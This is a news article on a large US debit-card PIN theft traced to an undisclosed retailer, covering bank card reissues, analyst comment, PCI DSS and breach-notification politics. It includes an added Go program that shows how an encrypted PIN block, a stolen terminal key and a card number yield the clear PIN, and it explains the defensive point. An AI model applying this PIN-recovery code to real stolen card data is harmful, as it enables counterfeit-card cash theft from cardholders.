More banks in the US are reissuing debit cards following the security breach at an undisclosed retailer that forced Citibank to block PIN-based ATM transactions on card accounts in Canada, Russia and the UK earlier this week.
Regional US banks including PNC Financial, National City and First National Bank of Pennsylvania have scrambled to close accounts and reissue debit cards following the breach. The banking industry has yet to issue a definitive statement on the incident, but it appears increasingly likely that the nation's banks have fallen victim to an industrial-scale hacking and card-skimming fraud.
Earlier this week Citibank imposed transaction blocks on an unspecified number of US card accounts after a series of fraudulent cash withdrawals at ATMs in the UK, Russia and Canada. The bank indicated that security problems stem from a breach at a US retailer, although no company name was disclosed.
National US banks including Bank of America, Wells Fargo and Washington Mutual have also blocked and reissued debit cards in recent weeks. Up to 600,000 cardholders are thought to be at risk.
Previously, PIN-based debit cards were thought to be safe from hackers, but Gartner analyst Avivah Litan says the banks' actions show that this incident is one of "the largest PIN thefts to date", in which the fraudsters not only collected card numbers, but also encrypted PIN data and the terminal keys needed to unscramble it.
"Armed with the PIN block and terminal encryption key, the thieves can determine a cardholder's PIN, then create counterfeit cards that enable them to withdraw cash at ATM machines," says Litan.
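The two layers Litan describes, as an added worked example that is not from the article or from Gartner: a PIN pad masks the PIN with the card number (ISO 9564 format 0) and then encrypts that block with the terminal PIN key, so an attacker holding the encrypted block, the key and the skimmed PAN can simply reverse both steps. The example assumes that format and single-block triple DES under a terminal PIN key, which is the usual scheme for PIN debit but is not something the article states about the breached terminals; the PAN, PIN and key are constructed sample values.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Constructed sample data for the demonstration: a made-up PAN, PIN and
// 24-byte triple-DES terminal PIN key (TPK). None of these relate to the
// breach described in the article.
const (
	SamplePAN    = "4000001234567899"
	SamplePIN    = "1234"
	SampleTPKHex = "0123456789ABCDEFFEDCBA987654321089ABCDEF01234567"
)

// pinField builds the ISO 9564-1 format 0 PIN field as 8 bytes:
// control nibble 0, PIN length nibble, the PIN digits, then 0xF padding.
func pinField(pin string) ([]byte, error) {
	if len(pin) < 4 || len(pin) > 12 {
		return nil, errors.New("PIN must be 4 to 12 digits")
	}
	for _, ch := range pin {
		if ch < '0' || ch > '9' {
			return nil, errors.New("PIN must be numeric")
		}
	}
	s := fmt.Sprintf("0%X%s", len(pin), pin)
	s += strings.Repeat("F", 16-len(s))
	return hex.DecodeString(s)
}

// panField builds the format 0 PAN field: 0000 followed by the 12
// rightmost PAN digits excluding the Luhn check digit.
func panField(pan string) ([]byte, error) {
	if len(pan) < 13 {
		return nil, errors.New("PAN too short for format 0")
	}
	body := pan[:len(pan)-1]
	return hex.DecodeString("0000" + body[len(body)-12:])
}

func xor8(a, b []byte) []byte {
	out := make([]byte, 8)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// EncodePINBlock returns the clear format 0 PIN block, pinField XOR panField.
// The XOR with the PAN is why the attacker also needs the card number,
// which the skimmed mag-stripe data supplies.
func EncodePINBlock(pin, pan string) ([]byte, error) {
	pf, err := pinField(pin)
	if err != nil {
		return nil, err
	}
	af, err := panField(pan)
	if err != nil {
		return nil, err
	}
	return xor8(pf, af), nil
}

// EncryptPINBlock is what the PIN pad does: one 8-byte block of
// triple DES under the terminal PIN key, no mode or padding involved.
func EncryptPINBlock(tpk, clear []byte) ([]byte, error) {
	c, err := des.NewTripleDESCipher(tpk)
	if err != nil {
		return nil, err
	}
	out := make([]byte, 8)
	c.Encrypt(out, clear)
	return out, nil
}

// RecoverPIN is the attacker's step from the article: with the encrypted
// PIN block, the terminal key and the PAN, reverse both layers and check
// that the result parses as a format 0 block (a wrong key almost always fails here).
func RecoverPIN(tpk, encBlock []byte, pan string) (string, error) {
	if len(encBlock) != 8 {
		return "", errors.New("encrypted PIN block must be 8 bytes")
	}
	c, err := des.NewTripleDESCipher(tpk)
	if err != nil {
		return "", err
	}
	clear := make([]byte, 8)
	c.Decrypt(clear, encBlock)
	af, err := panField(pan)
	if err != nil {
		return "", err
	}
	field := strings.ToUpper(hex.EncodeToString(xor8(clear, af)))
	if field[0] != '0' {
		return "", errors.New("not a format 0 PIN block (wrong key?)")
	}
	n, err := strconv.ParseUint(field[1:2], 16, 8)
	if err != nil || n < 4 || n > 12 {
		return "", errors.New("bad PIN length nibble (wrong key?)")
	}
	pl := int(n)
	pin, pad := field[2:2+pl], field[2+pl:]
	if strings.Trim(pad, "F") != "" {
		return "", errors.New("bad padding (wrong key?)")
	}
	for _, ch := range pin {
		if ch < '0' || ch > '9' {
			return "", errors.New("non-digit in PIN (wrong key?)")
		}
	}
	return pin, nil
}

func main() {
	tpk, _ := hex.DecodeString(SampleTPKHex)
	clear, _ := EncodePINBlock(SamplePIN, SamplePAN)
	enc, _ := EncryptPINBlock(tpk, clear)
	fmt.Printf("clear PIN block:     %X\n", clear)
	fmt.Printf("encrypted PIN block: %X\n", enc)
	pin, err := RecoverPIN(tpk, enc, SamplePAN)
	fmt.Println("recovered with stolen TPK:", pin, err)
	bad := append([]byte(nil), tpk...)
	bad[0] ^= 0x80 // flip a real key bit, not the DES parity bit
	pin, err = RecoverPIN(bad, enc, SamplePAN)
	fmt.Println("recovered with wrong key: ", pin, err)
}
```

The defender's reading of this is the one the rest of the article makes: the encrypted PIN block and the key that unlocks it must never sit together in a merchant's systems, and the PIN block should not be retained at all once the transaction has been authorised.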
Analysts believe the incident may lead the US banking community to reconsider its resistance to chip-based payment cards and force a nationwide flight from the less-secure mag-stripe standard.
Although the name of the retailer that suffered the breach hasn't been disclosed, speculation is mounting that the debit card data was obtained during an incident at office-supply firm OfficeMax, though the company has denied any involvement.
The Payment Card Industry Data Security Standard (PCI DSS), which defines how card and cardholder data must be handled and stored to keep it secure, expressly forbids merchants from retaining PIN data, even as an encrypted PIN block, after a transaction has been authorised. Compliance with the standard is nonetheless believed to be under 20% in the US.
Congressman Barney Frank, the senior Democrat on the House Financial Services Committee, recently called on credit card companies to name and shame retailers that suffer security breaches.
Frank said he was considering introducing legislation that would force companies that have suffered security breaches to notify customers of the incident, or be identified publicly as the party responsible.